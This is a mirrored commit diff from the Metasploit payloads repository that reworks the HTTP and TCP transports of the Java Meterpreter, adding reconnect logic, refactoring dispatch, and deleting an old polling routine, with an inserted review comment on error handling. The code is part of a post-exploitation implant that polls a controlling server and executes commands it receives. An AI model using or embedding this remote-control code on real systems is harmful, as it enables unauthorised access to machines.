mirror of https://github.com/rapid7/metasploit-payloads synced 2024-12-21 05:35:54 +01:00

Reconnect vs connet handling for HTTP/S

OJ 2015-06-24 21:57:08 +10:00
parent fbbff1e7b4
commit 85f2e12165
4 changed files with 42 additions and 90 deletions


@ -67,10 +67,42 @@ public class HttpTransport extends Transport {
} }
protected boolean tryConnect(Meterpreter met) throws IOException { protected boolean tryConnect(Meterpreter met) throws IOException {
// given that we don't have a persistent connection, we just assume System.out.println("msf : attempting to read packet on reconnect");
// that we "can" connect, and handle the failures when dealing with URLConnection conn = this.createConnection();
// the packet handling
return true; if (conn == null) {
return false;
}
OutputStream outputStream = conn.getOutputStream();
outputStream.write(RECV);
outputStream.close();
DataInputStream inputStream = new DataInputStream(conn.getInputStream());
try {
int len = inputStream.readInt();
int type = inputStream.readInt();
TLVPacket request = new TLVPacket(inputStream, len - 8);
inputStream.close();
// things are looking good, handle the packet and return true, as this
// is the situation that happens on initial connect (not reconnect)
TLVPacket response = request.createResponse();
int result = met.getCommandManager().executeCommand(met, request, response);
this.writePacket(response, TLVPacket.PACKET_TYPE_RESPONSE);
return true;
}
catch (EOFException ex) {
// this can happens on reconnect
return true;
}
catch (Exception ex) {
}
// we get here, thins aren't good.
return false;
} }
public TLVPacket readPacket() throws IOException { public TLVPacket readPacket() throws IOException {
@ -131,7 +163,7 @@ public class HttpTransport extends Transport {
} }
} }
public boolean dispatch(Meterpreter met, CommandManager commandManager) { public boolean dispatch(Meterpreter met) {
System.out.println("msf : In the dispatch loop"); System.out.println("msf : In the dispatch loop");
long lastPacket = System.currentTimeMillis(); long lastPacket = System.currentTimeMillis();
long ecount = 0; long ecount = 0;
@ -150,7 +182,7 @@ public class HttpTransport extends Transport {
lastPacket = System.currentTimeMillis(); lastPacket = System.currentTimeMillis();
TLVPacket response = request.createResponse(); TLVPacket response = request.createResponse();
int result = commandManager.executeCommand(met, request, response); int result = met.getCommandManager().executeCommand(met, request, response);
this.writePacket(response, TLVPacket.PACKET_TYPE_RESPONSE); this.writePacket(response, TLVPacket.PACKET_TYPE_RESPONSE);
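Review bot: In the new `tryConnect` body the `catch (Exception ex) { }` block is empty and `inputStream.close()` runs only on the success path, so every failure other than `EOFException` ends in `return false` with no recorded cause and the response stream left open. The `len` and `type` values read from the connection are also used unchecked: `len - 8` goes straight into the `TLVPacket` constructor and `type` is never compared, whereas the `pollURL` code removed from Meterpreter in this same commit rejected anything that was not `PACKET_TYPE_REQUEST`. I would validate both fields before parsing, report the exception the way the removed code did, and close the stream in a `finally`. Whether an unexpected packet type should return `false` here or be treated like the reconnect case is an assumption to confirm against the intended reconnect behaviour.

```java
DataInputStream inputStream = new DataInputStream(conn.getInputStream());
try {
    int len = inputStream.readInt();
    int type = inputStream.readInt();
    // the header is 8 bytes (length + type); reject short or non-request frames before parsing
    if (type != TLVPacket.PACKET_TYPE_REQUEST || len < 8) {
        return false;
    }
    TLVPacket request = new TLVPacket(inputStream, len - 8);
    // … unchanged: createResponse / executeCommand / writePacket, return true …
}
catch (EOFException ex) {
    // … unchanged: return true …
}
catch (Exception ex) {
    // keep the cause visible instead of discarding it
    ex.printStackTrace(met.getErrorStream());
}
finally {
    inputStream.close();
}
```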


@ -184,7 +184,7 @@ public class Meterpreter {
} }
System.out.println("msf : entering dispatch"); System.out.println("msf : entering dispatch");
boolean cleanExit = this.transports.current().dispatch(this, this.commandManager); boolean cleanExit = this.transports.current().dispatch(this);
System.out.println("msf : dispatch exited " + (cleanExit ? "cleanly" : "badly")); System.out.println("msf : dispatch exited " + (cleanExit ? "cleanly" : "badly"));
this.transports.current().disconnect(); this.transports.current().disconnect();
@ -207,86 +207,6 @@ public class Meterpreter {
return "com.metasploit.meterpreter.PayloadTrustManager"; return "com.metasploit.meterpreter.PayloadTrustManager";
} }
/**
* Poll from a given URL until a shutdown request is received.
*
* @param url
*/
//private void pollURL(URL url, int sessionExpirationTimeout, int sessionCommunicationTimeout) throws IOException {
// synchronized (this) {
// tlvQueue = new ArrayList();
// }
// int ecount = 0;
// long deadline = System.currentTimeMillis() + sessionExpirationTimeout * 1000L;
// long commDeadline = System.currentTimeMillis() + sessionCommunicationTimeout * 1000L;
// final byte[] RECV = "RECV".getBytes("ISO-8859-1");
// while (System.currentTimeMillis() < Math.min(commDeadline, deadline)) {
// byte[] outPacket = null;
// synchronized (this) {
// if (tlvQueue.size() > 0)
// outPacket = (byte[]) tlvQueue.remove(0);
// }
// TLVPacket request = null;
// try {
// URLConnection uc = url.openConnection();
// if (url.getProtocol().equals("https")) {
// // load the trust manager via reflection, to avoid loading
// // it when it is not needed (it requires Sun Java 1.4+)
// try {
// Class.forName(getPayloadTrustManager()).getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, new Object[]{uc});
// } catch (Exception ex) {
// ex.printStackTrace(getErrorStream());
// }
// }
// uc.setDoOutput(true);
// OutputStream out = uc.getOutputStream();
// out.write(outPacket == null ? RECV : outPacket);
// out.close();
// DataInputStream in = new DataInputStream(uc.getInputStream());
// int len;
// try {
// len = in.readInt();
// } catch (EOFException ex) {
// len = -1;
// }
// if (len != -1) {
// int ptype = in.readInt();
// if (ptype != PACKET_TYPE_REQUEST)
// throw new RuntimeException("Invalid packet type: " + ptype);
// request = new TLVPacket(in, len - 8);
// }
// in.close();
// commDeadline = System.currentTimeMillis() + sessionCommunicationTimeout * 1000L;
// } catch (IOException ex) {
// ex.printStackTrace(getErrorStream());
// // URL not reachable
// if (outPacket != null) {
// synchronized (this) {
// tlvQueue.add(0, outPacket);
// }
// }
// }
// if (request != null) {
// ecount = 0;
// TLVPacket response = executeCommand(request);
// if (response == null)
// break;
// writeTLV(PACKET_TYPE_RESPONSE, response);
// } else if (outPacket == null) {
// int delay;
// if (ecount < 10) {
// delay = 10 * ecount;
// } else {
// delay = 100 * ecount;
// }
// sleep(Math.min(10000, delay));
// }
// }
// synchronized (this) {
// tlvQueue = new ArrayList();
// }
//}
/** /**
* Get the command manager, used to register or lookup commands. * Get the command manager, used to register or lookup commands.
*/ */


@ -112,7 +112,7 @@ public class TcpTransport extends Transport {
} }
} }
public boolean dispatch(Meterpreter met, CommandManager commandManager) { public boolean dispatch(Meterpreter met) {
System.out.println("msf : In the dispatch loop"); System.out.println("msf : In the dispatch loop");
long lastPacket = System.currentTimeMillis(); long lastPacket = System.currentTimeMillis();
while (!met.hasSessionExpired() && while (!met.hasSessionExpired() &&
@ -131,7 +131,7 @@ public class TcpTransport extends Transport {
lastPacket = System.currentTimeMillis(); lastPacket = System.currentTimeMillis();
TLVPacket response = request.createResponse(); TLVPacket response = request.createResponse();
int result = commandManager.executeCommand(met, request, response); int result = met.getCommandManager().executeCommand(met, request, response);
this.writePacket(response, TLVPacket.PACKET_TYPE_RESPONSE); this.writePacket(response, TLVPacket.PACKET_TYPE_RESPONSE);


@ -18,7 +18,7 @@ public abstract class Transport {
public abstract int parseConfig(byte[] configuration, int offset); public abstract int parseConfig(byte[] configuration, int offset);
public abstract void bind(DataInputStream in, OutputStream rawOut); public abstract void bind(DataInputStream in, OutputStream rawOut);
public abstract void disconnect(); public abstract void disconnect();
public abstract boolean dispatch(Meterpreter met, CommandManager commandManager); public abstract boolean dispatch(Meterpreter met);
public abstract void writePacket(TLVPacket packet, int type) throws IOException; public abstract void writePacket(TLVPacket packet, int type) throws IOException;
public abstract TLVPacket readPacket() throws IOException; public abstract TLVPacket readPacket() throws IOException;